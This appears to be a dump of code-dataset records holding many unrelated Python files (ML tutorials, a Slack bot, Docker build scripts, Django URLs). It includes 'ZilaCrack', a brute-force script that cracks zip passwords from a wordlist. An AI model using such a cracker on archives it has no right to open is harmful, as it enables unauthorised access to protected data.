plt.show()\r\n print(\"_________________________________________________\")\r\n\r\n","sub_path":"lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38096855","text":"from app.models import SCSEModule, SEResNeXt\nimport torch\n\n\ndef test_scse() -> None:\n x = torch.randn(32, 256, 320, 320)\n layer = SCSEModule(in_channels=256, reduction=12,)\n y = layer(x)\n assert x.shape == y.shape\n\ndef test_seresnext() -> None:\n x = torch.randn(16, 3, 128, 128)\n layer = SEResNeXt(\n in_channels=3,\n out_channels=3474,\n depth=2,\n width=1024,\n )\n print(layer)\n y = layer(x)\n # assert 
x.shape == y.shape\n","sub_path":"app/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"487224900","text":"def check_updates():\n    \"\"\"Method to check for updates from the Git repo versus this version.\"\"\"\n    try:\n        last_version = str(request.urlopen(__source__).read().decode(\"utf8\"))\n        this_version = str(open(__file__).read())\n    except Exception as e:\n        log.warning(e)\n    else:\n        if this_version != last_version:\n            msg = \"There's a new version! Update the app from: \" + __source__\n            log.warning(msg)\n        else:\n            msg = \"No new updates! You have the latest version of this app.\"\n            log.info(msg)\n        return msg\n","sub_path":"components/check_updates.py","file_name":"check_updates.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"590118028","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\n\n# (1) Define the nodes ---------------------------------\n# Define the linear regression model (Wx + b)\nW = tf.Variable(tf.random_normal(shape=[1])) \nb = tf.Variable(tf.random_normal(shape=[1]))\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\n\n# Define the linear regression model operation\nlinear_model = W*x + b # predicted value\n# Define the loss function - MSE (mean squared error)\nloss = tf.reduce_mean(tf.square(linear_model - y)) # mean of squared (measured - predicted)\n\n# Define the summary info (scalar) for TensorBoard\ntf.summary.scalar('loss', loss)\n\n# Define the gradient descent optimizer for optimization\n# The learning rate sets the training speed\noptimizer = tf.train.GradientDescentOptimizer(0.01) # learning rate : 0.01\ntrain_step = optimizer.minimize(loss) # step in the direction that minimizes the loss\n\n# Prepare the input and output values for training\nx_train = [1, 2, 3, 4]\ny_train = [2, 4, 6, 8]\n\n# (2) Run the session and initialize the parameters (W, b) with random values drawn from a normal distribution\nsess = tf.Session()\nsess.run(tf.global_variables_initializer()) # assigns each variable an initial value from random_normal()\n\n\n# Configure the info passed to TensorBoard\nmerged = tf.summary.merge_all() # merge all the summary info\n# Set the folder path where the TensorBoard summaries are stored\ntensorboard_writer = tf.summary.FileWriter('./linear', sess.graph)\n\n# (3) Train the model : run gradient descent 1000 times\nfor i in range(1000):\n    sess.run(train_step, feed_dict={x: x_train, y: y_train}) # feed the input data\n    print( i, sess.run(W), sess.run(b))\n\n    # At every step, compute the TensorBoard summary values and save them to the given path ('./linear')\n    summary = sess.run(merged, feed_dict={x: x_train, y: y_train})\n    tensorboard_writer.add_summary(summary, i)\n\n# (4) Run a test\nx_test = [3.5, 5, 5.5, 6]\n# Use the test data to measure whether the trained linear regression model has learned the trend of the data (y=2x).\n# Expected true values : [7, 10, 11, 12]\nprint(sess.run(linear_model, feed_dict={x: x_test}))\n\n# (5) Shut down\nsess.close()","sub_path":"PythonAI/Source/W3D1/src/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"139539039","text":"import os\nimport sys\nimport fescripts.libs.fescripts\nfrom fescripts.libs.PFable import fable,fable_mode\nfrom colorama import init\ninit()\nfrom colorama import Fore,Back\nimport signal\nimport zipfile\n\nclass ZilaCrack:\n    def signal_handler(self,sig, frame):\n        self._end()\n    signal.signal(signal.SIGINT, signal_handler)\n    _fs = fescripts.libs.fescripts.FE_SCRIPTS(\"ZilaCrack\",\"break down zip files using brute force (crack zip file passwords)\",\"\"\"ZilaCrack is a FeScript that finds a zip file's password using a brute-force attack. 
you just need a password list to start attack using ZilaCrack.\"\"\",{'file': {'Body': '', 'Description': 'path of where zip file exist', 'Require': True}, 'wordlist': {'Body': '', 'Description': 'path of where wordlist exist', 'Require': True}},\"0xDeviI\")\n \n def __init__(self):\n pass\n \n def help(self):\n print(self._fs._totalDesc)\n\n def _help(self):\n return self._fs._totalDesc\n\n def _author(self):\n return self._fs._author\n \n def info(self):\n print(self._fs._miniDesc + \"\\n Author: \" + self._fs._author)\n \n def _info(self):\n return self._fs._miniDesc\n\n def allRequirement(self):\n keys = self._fs._Opt.keys()\n allKeys = []\n for i in keys:\n if (self._fs._Opt[i]['Require'] == True):\n allKeys.append(i)\n return allKeys\n\n def allSwitches(self):\n keys = self._fs._Opt.keys()\n allKeys = []\n for i in keys:\n allKeys.append(i)\n return allKeys\n\n def _pre_start(self):\n _all_req = self.allRequirement()\n found = False\n for i in _all_req:\n if (self._fs._Opt[i][\"Body\"] == \"\"):\n found = True\n break\n if (found):\n print(Fore.RED + \"All requirement switches not filled!\" + Fore.RESET) \n else:\n self._start()\n\n def showSwitch(self,sw):\n print(self._fs._Opt[sw][\"Body\"])\n\n\n def _start(self):\n print(\"\\nFatEagle Script ' \" + Fore.YELLOW + self.__class__.__name__ + Fore.RESET + \" '\" + Fore.GREEN + \" Started!\" + Fore.RESET)\n # --------------------------------------------> Script Started!\n if (os.path.exists(self._fs._Opt[\"file\"][\"Body\"]) and os.path.exists(self._fs._Opt[\"wordlist\"][\"Body\"])):\n if (zipfile.is_zipfile(self._fs._Opt[\"file\"][\"Body\"]) == False):\n print(Fore.LIGHTRED_EX + \"error: Bad zipfile!\" + Fore.RESET)\n else:\n _zfile = zipfile.ZipFile(self._fs._Opt[\"file\"][\"Body\"])\n _wl = open(self._fs._Opt[\"wordlist\"][\"Body\"],\"r\",encoding=\"utf-8\")\n for i in _wl.readlines():\n i = i.replace(\"\\n\",\"\")\n try:\n _zfile.extractall(path=\"fescripts/temp/extracted/\",pwd=bytes(i,\"utf-8\"))\n print(Fore.LIGHTGREEN_EX + \"[+] Password Found: \" + i + Fore.RESET)\n break\n except:\n print(Fore.LIGHTRED_EX + \"[-]\" + Fore.RESET + \" Password: \" + i)\n _wl.close()\n else:\n print(Fore.LIGHTRED_EX + \"error: zipfile or wordlist not exist!\" + Fore.RESET)\n # --------------------------------------------> Script Stopped!\n self._end()\n\n def _end(self):\n print(\"FatEagle Script ' \" + Fore.YELLOW + self.__class__.__name__ + Fore.RESET + \" '\" + Fore.RED + \" Stopped!\\n\\n\" + Fore.RESET)\n \n def missedSwitch(self):\n fable_data = []\n keys = self._fs._Opt.keys()\n for i in keys:\n if (self._fs._Opt[i].get(\"Require\") == True and self._fs._Opt[i].get(\"Body\") == \"\"):\n fable_data.append([i,self._fs._Opt[i].get(\"Body\"),self._fs._Opt[i].get(\"Description\")])\n fabled = fable([\"switch name\",\"value\",\"descrption\"],fable_data,fable_mode.SLICED)\n print(fabled.popData())\n\n def switchInfo(self):\n fable_data = []\n keys = self._fs._Opt.keys()\n for i in keys:\n fable_data.append([i,self._fs._Opt[i].get(\"Body\"),str(self._fs._Opt[i].get(\"Require\")),self._fs._Opt[i].get(\"Description\")])\n fabled = fable([\"switch name\",\"value\",\"required\",\"descrption\"],fable_data,fable_mode.SLICED)\n print(fabled.popData())\n \n def setSwitch(self,prop,value):\n self._fs._Opt[prop][\"Body\"] = value\n","sub_path":"fescripts/bruteforce/ZilaCrack.py","file_name":"ZilaCrack.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
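The ZilaCrack record above has two fragile spots: signal.signal is called at class-definition time with the plain signal_handler function, so when SIGINT actually fires the interpreter maps signum onto self and the handler raises, and the password loop hides every failure behind a bare except. Below is a minimal standalone sketch of the same two ideas done more defensively; the class name ZipBruteForcer, the paths, and the pair of exception types caught are illustrative assumptions, not part of the original record.

import signal
import sys
import zipfile

class ZipBruteForcer:
    def __init__(self, archive_path, wordlist_path):
        # Hypothetical paths supplied by the caller.
        self.archive_path = archive_path
        self.wordlist_path = wordlist_path
        # Register the *bound* method, so the handler really receives (sig, frame).
        signal.signal(signal.SIGINT, self.signal_handler)

    def signal_handler(self, sig, frame):
        print("Stopped!")
        sys.exit(0)

    def crack(self):
        zf = zipfile.ZipFile(self.archive_path)
        with open(self.wordlist_path, "r", encoding="utf-8") as wordlist:
            for line in wordlist:
                password = line.strip()
                try:
                    # extractall() raises on a wrong password, so returning here means success.
                    zf.extractall(path="extracted/", pwd=password.encode("utf-8"))
                    return password
                except (RuntimeError, zipfile.BadZipFile):
                    # Errors a wrong password is known to produce; anything else propagates.
                    continue
        return None

Registering inside __init__ is the key difference from the record above: ZilaCrack passes the unbound function while the class body is still executing, which cannot work once the handler needs self.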
+{"seq_id":"267471799","text":"import os\nimport cgi\nfrom google.appengine.api import channel\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\nfrom Save import *\n\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname(__file__), 'index.html')\n self.response.out.write(template.render(path, {}))\n\n\nclass SiteMap(webapp.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname(__file__), 'sitemap.xml')\n self.response.out.write(template.render(path, {}))\n\n\nclass Multiplayer(webapp.RequestHandler):\n def get(self):\n if (self.request.path == '/mp.create'):\n# user = users.get_current_user()\n game_key = '123'\n token = channel.create_channel(game_key + '.0')\n self.response.out.write(game_key + ',' + token)\n\n elif (self.request.path == '/mp.join'):\n game_key = self.request.get('k')\n# user = users.get_current_user()\n token = channel.create_channel(game_key + '.1')\n self.response.out.write(token)\n\n elif (self.request.path == '/mp.joined'):\n game_key = self.request.get('k')\n channel.send_message(game_key + '.0', 'hallo-hallo! i joined!')\n\n\napplication = webapp.WSGIApplication(\n [\n ('/', MainPage),\n ('/sitemap.xml', SiteMap),\n ('/save.list', Save),\n ('/save.delete', Save),\n ('/save.load', Save),\n ('/save.save', Save),\n ('/mp.create', Multiplayer),\n ('/mp.join', Multiplayer),\n ('/mp.joined', Multiplayer)\n ], debug = True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"appspot/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53526511","text":"\"\"\"\nPytorch dataset class for the Stanford Dogs dataset\nYarne Hermann YPH2105\n\"\"\"\nimport os\nimport random\nrandom.seed(0)\n\nimport numpy as np\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom PIL import Image\n\nclass StanfordDogs(Dataset):\n NUM_CLASSES = 120\n\n def __init__(self, path, specific_classes=None, crop_size=256, resize=True):\n super().__init__()\n self.crop_size = crop_size\n self.dataset_dict, self.classes = self.load_data_from_path(path)\n self.specific_classes = specific_classes\n self.current_dataset = self.prepare_dataset_for_use()\n if resize:\n self.transform = self.transform = transforms.Compose([\n transforms.Resize((self.crop_size, self.crop_size)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n else:\n self.transform = transforms.Compose([\n transforms.CenterCrop((self.crop_size, self.crop_size)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n\n def load_data_from_path(self, path):\n # 1 Read class names from directories and store in a classes array\n classes = []\n dataset_dict = {}\n\n # 2 Read in the images, with corresponding label the index of the class name\n for o in os.listdir(path):\n if os.path.isdir(os.path.join(path, o)):\n class_name = o[10:] # Taking [10:] makes us get the dog name without a code in the front\n classes.append(class_name)\n dataset_dict[class_name] = []\n for img_path in os.listdir(os.path.join(path, o)):\n if \".jpg\" in img_path:\n dataset_dict[class_name].append(os.path.join(path, o, img_path))\n return dataset_dict, classes\n\n # 3 construct current (shuffled) dataset\n 
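    # prepare_dataset_for_use() below flattens the {class_name: [image_paths]} dict into one
    # shuffled list of (image_path, class_index) pairs; when specific_classes is given, only
    # those classes are kept.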
def prepare_dataset_for_use(self):\n current_dataset = []\n if self.specific_classes is None:\n for class_name, class_image_paths in self.dataset_dict.items():\n class_idx = self.classes.index(class_name)\n for img_path in class_image_paths:\n current_dataset.append((img_path, class_idx))\n else: #only get specific classes\n for class_name in self.specific_classes:\n class_image_paths = self.dataset_dict[class_name]\n class_idx = self.classes.index(class_name)\n for img_path in class_image_paths:\n current_dataset.append((img_path, class_idx))\n\n # shuffle\n random.shuffle(current_dataset)\n return current_dataset\n\n\n\n \"\"\"\n This will allow to dynamically restrict to only a subset of more specific classes\n (Not used in final result)\n \"\"\"\n def set_specific_classes(self, specific_classes=None):\n # self.specific_classes=specific_classes\n # #TODO: adapt current_dataset to only use images from the specific classes\n # self.current_dataset = self.prepare_dataset_for_use()\n pass\n\n def get_num_classes(self):\n if self.specific_classes: \n return len(self.specific_classes)\n return self.NUM_CLASSES\n\n def __getitem__(self, index):\n img_path, label = self.current_dataset[index]\n image = Image.open(img_path)\n if (np.array(image).shape[2] != 3):\n print(img_path, label, np.array(image).shape)\n image = self.transform(image)\n\n return image, label\n\n def __len__(self):\n return len(self.current_dataset)\n\n","sub_path":"original_CAN/data/stanford_dogs.py","file_name":"stanford_dogs.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260736329","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n##############################################\n# Home\t: http://netkiller.github.io\n# Author: Neo \n# Upgrade: 2021-09-05\n##############################################\ntry:\n\timport os, sys\n\tmodule = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\tprint(module)\n\tsys.path.insert(0,module)\n\tfrom netkiller.docker import *\nexcept ImportError as err:\n\tprint(\"%s\" %(err))\n\ndockerfile = Dockerfile() \n# dockerfile.label({'org.opencontainers.image.authors':'netkiller'})\ndockerfile.image('openjdk:8-alpine')\n# dockerfile.image('openjdk:8')\ndockerfile.env({'ROCKETMQ_VERSION':'4.9.2','ROCKETMQ_HOME':'/srv/rocketmq', 'PATH':'${ROCKETMQ_HOME}/bin:$PATH'}) # 'JAVA_OPT':'\"${JAVA_OPT} -server -Xms512m -Xmx2048m -Xmn128m\"'\ndockerfile.arg({'user':'rocketmq', 'group':'nogroup'})\ndockerfile.run('wget https://dlcdn.apache.org/rocketmq/4.9.2/rocketmq-all-4.9.2-bin-release.zip && unzip rocketmq-all-4.9.2-bin-release.zip')\ndockerfile.run('mv rocketmq-4.9.2 /srv/rocketmq-4.9.2 && rm -rf rocketmq-all-4.9.2-bin-release.zip')\ndockerfile.run('ln -s /srv/rocketmq-${ROCKETMQ_VERSION} /srv/rocketmq')\ndockerfile.run('adduser -S -D ${user}')\ndockerfile.run(['chown ${user}:${group} -R /srv/rocketmq-${ROCKETMQ_VERSION}'])\ndockerfile.expose(['9876'])\ndockerfile.expose(['10909','10911','10912'])\ndockerfile.copy('docker-entrypoint.sh','/srv/docker-entrypoint.sh')\ndockerfile.run('chmod a+x /srv/docker-entrypoint.sh')\ndockerfile.entrypoint('[\"/srv/docker-entrypoint.sh\"]') \ndockerfile.workdir('${ROCKETMQ_HOME}')\n# dockerfile.render()\n# dockerfile.save('/tmp/Dockerfile')\n\nrocketmq = Services('rocketmq')\nrocketmq.build(dockerfile).image('registry.netkiller.cn/rocketmq/rocketmq:4.9.2').container_name('rocketmq')\n# 
rocketmq.entrypoint('/srv/rocketmq/bin/mqnamesrv')\n# rocketmq.ports('9876:9876').command('/srv/rocketmq/bin/mqnamesrv')\n\ndockerfile = Dockerfile() \ndockerfile.image('registry.netkiller.cn/rocketmq/rocketmq:4.9.2')\ndockerfile.run('ln -s /srv/rocketmq-${ROCKETMQ_VERSION} /srv/mqnamesrv')\ndockerfile.cmd('/srv/mqnamesrv/bin/mqnamesrv')\ndockerfile.workdir('/srv/mqnamesrv')\ndockerfile.user('rocketmq:nogroup')\ndockerfile.volume([\n \t'/home/rocketmq/logs/rocketmqlogs'\n])\n\nmqnamesrv = Services('mqnamesrv')\nmqnamesrv.build(dockerfile).image('registry.netkiller.cn/rocketmq/mqnamesrv:4.9.2').container_name('mqnamesrv').ports('9876:9876')\nmqnamesrv.command('mqnamesrv')\n\ndockerfile = Dockerfile() \ndockerfile.image('registry.netkiller.cn/rocketmq/rocketmq:4.9.2')\ndockerfile.run('ln -s /srv/rocketmq-${ROCKETMQ_VERSION} /srv/mqbroker')\ndockerfile.cmd('/srv/rocketmq/bin/mqbroker')\ndockerfile.workdir('/srv/mqbroker')\ndockerfile.user('rocketmq:nogroup')\ndockerfile.volume([\n \t'/home/rocketmq/logs/rocketmqlogs'\n])\n\nmqbroker = Services('mqbroker')\nmqbroker.build(dockerfile).image('registry.netkiller.cn/rocketmq/mqbroker:4.9.2').container_name('mqbroker').ports(['10909:10909','10911:10911','10912:10912'])\nmqbroker.command('mqbroker -n mqnamesrv:9876 -c /srv/rocketmq/conf/broker.conf')\nmqbroker.volumes(['/tmp/logs:/home/rocketmq/logs/rocketmqlogs'])\n\ncomposes = Composes('rocketmq')\ncomposes.version('3.9')\ncomposes.services(rocketmq)\ncomposes.services(mqnamesrv)\ncomposes.services(mqbroker)\n\n\n# cat >> /srv/docker-entrypoint.sh <<'EOF'\n# EOF\n\nentrypoint='''#!/bin/sh\nif [ \"$1\" = 'mqnamesrv' ]; then\n\texec /srv/rocketmq/bin/mqnamesrv\nfi\nexec \"$@\"\n'''\n\nif __name__ == '__main__':\n\ttry:\n\t\tdocker = Docker({'DOCKER_HOST':'ssh://root@192.168.30.11','NAMESRV_ADDR':'localhost:9876'}) \n\t\tdocker.createfile('rocketmq/rocketmq/docker-entrypoint.sh',entrypoint)\n\t\tdocker.environment(composes)\n\t\tdocker.main()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Ctrl+C Pressed. 
Shutting down.\")","sub_path":"container/docker/rocketmq/rocketmq.py","file_name":"rocketmq.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601536049","text":"import sys, uwsgi\nfrom pika import BlockingConnection, ConnectionParameters\n\ndef application(env, start_response):\n connection = BlockingConnection(ConnectionParameters(host = 'localhost'))\n\n channel = connection.channel()\n\n exchange = env['PATH_INFO'].replace('/', '')\n\n channel.exchange_declare(exchange = exchange, exchange_type = 'fanout')\n\n result = channel.queue_declare(exclusive = True)\n queue_name = result.method.queue\n\n channel.queue_bind(exchange = exchange, queue = queue_name)\n\n # Prevents loading workers with even distribution of task.\n # Otherwise tasks will be assigned to the workers sequentially, which may load any worker.\n channel.basic_qos(prefetch_count = 1)\n\n uwsgi.websocket_handshake(env['HTTP_SEC_WEBSOCKET_KEY'], env.get('HTTP_ORIGIN', ''))\n\n def keepalive_by_pingpong():\n '''Keeps websocket connection alive (called in every 30 seconds).'''\n print('PING/PONG...\\n')\n\n try:\n uwsgi.websocket_recv_nb()\n connection.add_timeout(30, keepalive_by_pingpong)\n except OSError as error:\n connection.close()\n print(error)\n sys.exit(1) # The process is closed and uwsgi respawns it.\n \n return\n \n keepalive_by_pingpong()\n\n while True:\n for method, properties, body in channel.consume(queue_name):\n try:\n uwsgi.websocket_send(body)\n except OSError as error:\n print(error)\n sys.exit(1)\n else:\n channel.basic_ack(delivery_tag = method.delivery_tag)\n \n return","sub_path":"shareland/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434890028","text":"import io\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nps = PorterStemmer()\r\n#word_tokenize accepts a string as an input, not a file.\r\nstop_words = set(stopwords.words('english'))\r\nfilepath = \"E:\\Sentiment_analysis\\data.csv\" #KEY IN PATH OF SOURCE FILE\r\noutfile = \"E:\\Sentiment_analysis\\data_filtered.csv\" #KEY IN PATH OF THE DESTINATION AND CLEAN TEXT FILE\r\n\r\nwith open(filepath,encoding=\"utf8\", errors='ignore') as file:\r\n for cnt,line in enumerate(file):\r\n words = line.split() #this will split the lines into words\r\n for r in words:\r\n if not r in stop_words:\r\n appendFile = open(outfile, 'a')\r\n # appendFile.write(ps.stem(r) + \" \")\r\n appendFile.write(r + \" \")\r\n appendFile.close()\r\n appendFile = open(outfile, 'a') #write the cleaned data.\r\n appendFile.write(\"\\n\")\r\n appendFile.close()\r\n\r\n","sub_path":"Text_cleaner.py","file_name":"Text_cleaner.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303986666","text":"import os\nimport requests\nimport re\nfrom flask import Flask, request, Response, jsonify\nfrom slackclient import SlackClient\n\napp = Flask(__name__)\n\nSLACK_OAUTH_TOKEN = os.environ['SLACK_OAUTH_TOKEN']\nSLACK_WEBHOOK_TOKEN = os.environ['SLACK_VERIFICATION_TOKEN']\n\nslack = SlackClient(SLACK_OAUTH_TOKEN)\n\npredictit = 'https://www.predictit.org/api/marketdata/all'\ndefault_sort_order = [['LastTradePrice', True]]\n\n# Utility functions\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return 
False\n\n# Data transformation\ndef get_markets():\n return requests.get(predictit).json()['Markets']\n\ndef get_contracts():\n return [{k:c[k] for k in c}\n for m in get_markets() for c in m['Contracts']]\n\ndef find_contracts(symbol=''):\n regex = re.compile(\"^.*\" + symbol.upper() + \".*$\")\n return [c for c in get_contracts()\n if regex.match(c['TickerSymbol'])]\n\ndef sort_contracts(contracts, sort_order=default_sort_order):\n return sorted(contracts, key=lambda x: x[sort_order[0][0]],\n reverse=sort_order[0][1])\n\ndef form_chart_url(id):\n return 'https://www.predictit.org/PublicData/GetChartData' + \\\n '?contractIds=' + str(id)+ '×pan=24H'\n\ndef scrape_chart(id):\n return requests.get(form_chart_url(id)).json()\n\ndef append_chart_data(contracts):\n for contract in contracts:\n contract['DailyChartData'] = scrape_chart(contract['ID'])\n return contracts\n\ndef longest_ticker(contracts):\n return max(len(c['TickerSymbol']) for c in contracts)\n\ndef format_price(price):\n return str(int(round(price * 100))\n if is_number(str(price)) else \"--\")\n\ndef format_contracts(contracts):\n max_ticker_len = max(len(c['TickerSymbol']) for c in contracts)\n max_sum_vol_len = max(max(len(str(sum(hr['TradeVolume']\n for hr in c['DailyChartData'])))\n for c in contracts), 3)\n max_1h_vol_len = max(max(len(str(c['DailyChartData'][23]['TradeVolume']))\n for c in contracts), 3)\n max_2h_vol_len = max(max(len(str(c['DailyChartData'][22]['TradeVolume']))\n for c in contracts), 3)\n max_3h_vol_len = max(max(len(str(c['DailyChartData'][21]['TradeVolume']))\n for c in contracts), 3)\n offset = 4\n header = \"la\".ljust(2 + offset) + \\\n \"Symbol\".ljust(max_ticker_len + offset) + \\\n \"Tdy\".rjust(max_sum_vol_len).ljust(max_sum_vol_len + offset - 2) + \\\n \"-1h\".rjust(max_1h_vol_len).ljust(max_1h_vol_len + offset - 2) + \\\n \"-2h\".rjust(max_2h_vol_len).ljust(max_2h_vol_len + offset - 2) + \\\n \"-3h\".rjust(max_3h_vol_len).ljust(max_3h_vol_len + offset) + \\\n \"bY sY\".ljust(5 + offset - 2) + \\\n \"bN sN\".ljust(5 + offset) + \\\n \"Link\"\n border = \"-\" * len(header)\n message = '```' + header + '\\n' + border + '\\n' + '\\n'.join(\n [format_price(c['LastTradePrice']).rjust(2).ljust(2 + offset) +\n c['TickerSymbol'].ljust(max_ticker_len + offset) +\n str(sum(hr['TradeVolume'] for hr in c['DailyChartData']))\n .rjust(max_sum_vol_len).ljust(max_sum_vol_len + offset - 2) +\n str(c['DailyChartData'][23]['TradeVolume'])\n .rjust(max_1h_vol_len).ljust(max_1h_vol_len + offset - 2) +\n str(c['DailyChartData'][22]['TradeVolume'])\n .rjust(max_2h_vol_len).ljust(max_2h_vol_len + offset - 2) +\n str(c['DailyChartData'][21]['TradeVolume'])\n .rjust(max_3h_vol_len).ljust(max_3h_vol_len + offset) +\n (format_price(c['BestBuyYesCost']).rjust(2) + \":\" +\n format_price(c['BestSellYesCost']).ljust(2)).ljust(5 + offset - 2) +\n (format_price(c['BestBuyNoCost']).rjust(2) + \":\" +\n format_price(c['BestSellNoCost']).ljust(2)).ljust(5 + offset) +\n '<' + c['URL'] + '|' + 'Link' + '>'\n for c in contracts]) + '```'\n return message\n\n# Slack methods\ndef post_to_channel(channel, text):\n slack.api_call('chat.postMessage', channel=channel, text=text)\n\ndef receive_slash_command():\n if request.form.get('token') == SLACK_WEBHOOK_TOKEN:\n channel = request.form.get('channel_name')\n username = request.form.get('user_name')\n text = request.form.get('text')\n return {'username': username, 'channel': channel,\n 'text': text}\n\n# General REST API\n@app.route(\"/\")\ndef index():\n return \"
The absolute boy!
\"\n\n# Slackboy REST API\n@app.route('/slackboy/contract', methods=['POST'])\ndef slash_contract():\n if receive_slash_command():\n c = receive_slash_command()\n contracts = format_contracts(append_chart_data(\n sort_contracts(find_contracts(c['text']))))\n post_to_channel(c['channel'], contracts)\n return Response(), 200\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)","sub_path":"slackboy.py","file_name":"slackboy.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"385986144","text":"# Question 4\n\"\"\"\nResources:\n1. To decern if the input was a string or an integer I had to use try and except.\nI discovered how to use it at the following link. I use this in every other \nexample where this is needed: https://pynative.com/python-check-user-input-is-number-or-string/\n2. Needed a way to print the list nums without brackets, commas or quotes to \nmatch the question. Throung this post: https://www.quora.com/How-can-I-drop-brackets-in-a-Python-list-in-order-to-go-from-1-2-3-to-1-2-3 \non quora I found a way to run a for loop within the print statement to turn\neach element to a string and join them with a space (i.e. \" \").\n\"\"\"\n\"\"\"\nTO DO:\n\"\"\"\n\n# Create prompt to collect input integer as variable.\nnum = input(\"Please enter a positive integer: \")\n# Create list to hold numbers.\nnumsList = []\n\n# Try this code and if no errors run this code.\ntry:\n # Convert input (num) to an integer.\n num = int(num)\n # While the variable num is less then one run this code.\n while num > 1:\n # If num is even.\n if (num % 2 == 0):\n # Devide it by 2.\n num = num / 2\n # Add this number to the list.\n numsList.append(int(num))\n # Else if num is odd.\n elif (num % 2 != 0):\n # Multiple by 3 and add 1.\n num = (num * 3) + 1\n # Add this number to the list.\n numsList.append(int(num))\n # Go through list and print as string and seperate each element with a space (ie \" \")\n print(\" \".join(str(a) for a in numsList))\n\n# If there is an error run this instead.\nexcept ValueError:\n # The error means the input wasn't and integer so print statement.\n print(\"This is not an integer. Please try again.\")","sub_path":"collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209754306","text":"from django.conf.urls import patterns, include, url\n\nfrom . import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name='home'),\n url(r'^find.json$', views.find_json, name='find_json'),\n url(r'^orgs/(?P[A-Za-z0-9_\\-]+)/$',\n views.organization_detail, name='organization_detail'),\n url(r'^orgs/(?P[A-Za-z0-9_\\-]+)/edit/$',\n views.organization_edit, name='organization_edit'),\n\n # Note that this happens to be in sync with the default\n # get_absolute_url() on the User model. 
If this URL changes,\n # we should set settings.ABSOLUTE_URL_OVERRIDES as per\n # http://stackoverflow.com/a/2328856.\n url(r'^users/(?P[A-Za-z0-9_@+.\\-]+)/$',\n views.user_detail, name='user_detail'),\n\n url(r'^accounts/profile/$', views.user_edit, name='user_edit'),\n)\n","sub_path":"directory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"142065548","text":"from random import randint\n\nx = randint(0, 10)\n#print(x)\nacerto = 0\ni = 0\n\nwhile acerto == 0:\n y = int(input('Adivinhe um numero de 0 a 10: '))\n i += 1\n if x == y:\n acerto = 1\n else:\n if x > y:\n print('Mais. Tente novamente.')\n else:\n print('Menos. Tente novamente.')\nif i == 1:\n print('Acertou de primeira.')\nelse:\n print('Acertou. Foram necessarios {} palpites para vencer.'.format(i))\n","sub_path":"CursoemVideo/ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114774925","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^logout$', views.logout),\n\turl(r'^remove/(?P\\d+)$', views.remove),\n\turl(r'^addexisting/(?P\\d+)$', views.addexisting),\n\t# url(r'^delete/(?P\\d+)$', views.delete),\n\turl(r'^view/(?P\\d+)$', views.view),\n\turl(r'^add$', views.add),\n\turl(r'^additem$', views.additem),\n\turl(r'^addtoWish$', views.addtoWish, name='addWish'),\n]","sub_path":"apps/black/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627238872","text":"from keras.models import Model\nfrom keras.layers import Input, Conv1D, Dense, Activation, 